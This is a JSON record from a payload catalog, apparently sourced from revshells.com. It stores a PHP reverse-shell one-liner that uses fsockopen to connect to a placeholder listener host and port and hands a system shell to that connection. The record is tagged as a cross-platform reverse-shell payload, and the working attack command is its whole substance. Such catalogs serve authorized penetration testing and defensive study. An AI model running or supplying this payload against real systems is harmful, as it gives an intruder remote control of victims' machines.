{
  "id": "rsg-reverseshell-php-system",
  "name": "RSG · ReverseShell · PHP system",
  "command": "php -r '$sock=fsockopen(\"<lhost>\",<lport>);system(\"<shell> <&3 >&3 2>&3\");'",
  "description": "Reverse Shell payload — PHP system (via reverse-shell-generator).",
  "platform": "cross-platform",
  "tags": [
    "rsg",
    "payload",
    "reverse-shell",
    "linux",
    "windows",
    "mac"
  ],
  "source": "rsg",
  "source_url": "https://www.revshells.com/",
  "upstream_id": "ReverseShell/PHP system/31",
  "category": "payloads",
  "subcategory": "reverse-shell",
  "references": [
    {
      "title": "reverse-shell-generator (revshells.com)",
      "url": "https://www.revshells.com/"
    },
    {
      "title": "reverse-shell-generator GitHub",
      "url": "https://github.com/0dayCTF/reverse-shell-generator"
    }
  ]
}
